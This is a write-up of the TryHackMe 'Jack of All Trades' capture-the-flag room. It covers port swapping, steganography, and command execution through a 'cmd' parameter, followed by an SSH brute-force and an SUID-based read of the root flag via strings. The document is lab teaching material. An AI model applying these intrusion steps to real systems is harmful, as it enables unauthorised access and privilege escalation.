TRYHACKME JACK OF ALL TRADES WRITEUP

WEBSITE LINK : https://tryhackme.com/room/jackofalltrades

After deploying the machine we firstly go for NMAP scan to find services and ports open on that IP address.

From NMAP scan we can see that port 80 and 22 are open but there is one thing to notice that HTTP is on port 22 and SSH on port 80.

So when we paste the IP address in the browser it gives an error that connection was reset so to corret this we have to config our Firefox.

To config the Firefox we have to go to about:config in the Firefox search bar then search for network.security.ports.banned.override in the search box if it not available as like in me then right click and then choose new then string and search for it then modify it's value to 22. After it our webpage will open.

When we look at it's source code we can fin that there is a base64 string and a comment "I can get back recovery.php" and after decoding  that string using CyberChef we get a password of something.

After this I go back and go to recovery.php page which we get in the source code there it was asking password and username so tried jack as username and password which we get from CyberChef but it is wrong. So I search for source code of the recovery page there we get an another string in the comment similarly I decode that from the CyberChef and there I got the link of bit.ly.

The bit.ly link is redirecting us to the Wikipedia page of Stegosauria. After lot of searching in the edits and web archive of the page I am not able to find anything.

So I came to the recovery page and read the decoded text which we get from the source code of it. There is written credentials are given at the homepage so I go to cookies and check the files available on it but nothing there. Then I think there are two images also on the page also I downloaded both.

jackinthebox.jpg

stego.jpg

and try for the basic stenography techniques like strings, exiftool, binwalk  but no results then I did steghide on the image stego.jpg but it needs a password so I tried for the password I got from the main page  and It gives me you are on right path but wrong image. So, I follow the same process for the jackinthebox.jpg. But it gives message wrong password. So I go back to the source code of home page there I found one more image index.jpeg.

index.jpeg

And I used steghide on it with the same password and here we got the credentials of jack login. I go to recovery page and used the credentials and it works.

After login to the recovery page we got a statement "GET me a cmd" so I used cmd as a variable and pass ls as a value and it works 😉. It list the files available in that directory.

So I thought if user flag is in home directory I can easily find it but instead of user flag we get the file "jack_password_list" I cat the file and find all the password of the jack from it.

After this we only left with the ssh port. So first thought strike in my mind is to brute-force SSH with the above password list agaisnt user jack and it work and we get our password.

I login in the system with the ssh and find a user.jpg file. Firstly I convert the image to base64 and try to decode the base64 to get image but this time it doesn't work so I choose SCP command "scp -P 80 jack@[I.P.]:user.jpg /home" to get file.

After downloading and viewing the image we get our user flag in it.

After it I go back and try sudo -l to find which command we can execute as root. But jack is not the root user. So if sudo -l doesn't work I always search for the SUID bits so that we can run that with the power of root.

find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null

we find a lot of files and cmd that have SUID bits but we need one that can help us to get the root flag. And we get one /usr/bin/strings and try to read the file root.txt in the root as it was mention in the Hint also. And we got the final root flag also 😎.